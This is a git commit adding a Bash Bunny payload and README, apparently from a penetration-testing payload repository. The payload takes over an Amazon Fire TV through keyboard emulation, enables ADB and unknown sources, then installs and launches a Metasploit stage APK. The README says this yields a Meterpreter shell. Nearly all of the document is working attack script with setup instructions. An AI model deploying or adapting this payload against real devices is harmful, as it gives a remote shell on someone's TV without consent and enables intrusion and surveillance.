Added a Fireytv payload (#135)
* Created payload to shell an amazon fire tv The payload performs keyboard emulation in order to enable ADB and unknown sources on the target FireTV. Once this is completed the payload then installs a payload.apk file via ADB and then runs it. * Created readmepull/134/merge
parent
18e71d2882
commit
f94fcc1b66
|
@ -0,0 +1,75 @@
|
|||
# Title: Firey TV
|
||||
# Author: DemmSec
|
||||
# Version: 1.0
|
||||
#
|
||||
# Enables ADB and unknown sources on a target FireTV
|
||||
# Then pushes a payload APK via ADB
|
||||
#
|
||||
# Requires android-tools-adb installed on the Bash Bunny
|
||||
#
|
||||
# Purple ............Running HID emulation, enabling ADB and unknown sources
|
||||
# Blue Blinking ...............Running ADB command to push payload.apk
|
||||
# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
|
||||
# Green..............Finished
|
||||
ATTACKMODE HID
|
||||
LED R B 0
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q DOWNARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q DOWNARROW
|
||||
Q DELAY 800
|
||||
Q ENTER
|
||||
Q DELAY 800
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q DOWNARROW
|
||||
Q DELAY 500
|
||||
Q DOWNARROW
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
Q DELAY 200
|
||||
Q ESCAPE
|
||||
ATTACKMODE ECM_ETHERNET
|
||||
LED B 2000
|
||||
source bunny_helpers.sh
|
||||
if [ -z "${TARGET_IP}" ]; then
|
||||
LED R 2000
|
||||
exit 1
|
||||
fi
|
||||
adb connect ${TARGET_IP}
|
||||
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
|
||||
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
|
||||
LED G
|
|
@ -0,0 +1,28 @@
|
|||
# Meterpreter shell on an Amazon Fire TV
|
||||
|
||||
* Author: DemmSec
|
||||
* Version: Version 1.0
|
||||
* Target: Amazon FireTV (Latest Firmware/Version)
|
||||
|
||||
|
||||
## Description
|
||||
|
||||
Enables ADB and Unknown sources via keyboard input on the target Fire TV, then uses ADB to go ahead and install payload.apk from the switch directory and then execute it.
|
||||
|
||||
## Requirements
|
||||
|
||||
Requires: android-tools-adb
|
||||
To install this simply share your internet connection with the Bash Bunny. SSH into it and run: apt-get install android-tools-adb
|
||||
|
||||
## Configuration
|
||||
|
||||
Create a payload APK file and place it in the same directory as payload.txt, plug in and wait.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Purple | Running keyboard emulation |
|
||||
| Blue Blinking | Running ADB to push payload to Fire TV |
|
||||
| Red Blinking | Fire TV failed to get an IP address |
|
||||
| Green | Finished |
|
Loading…
Reference in New Issue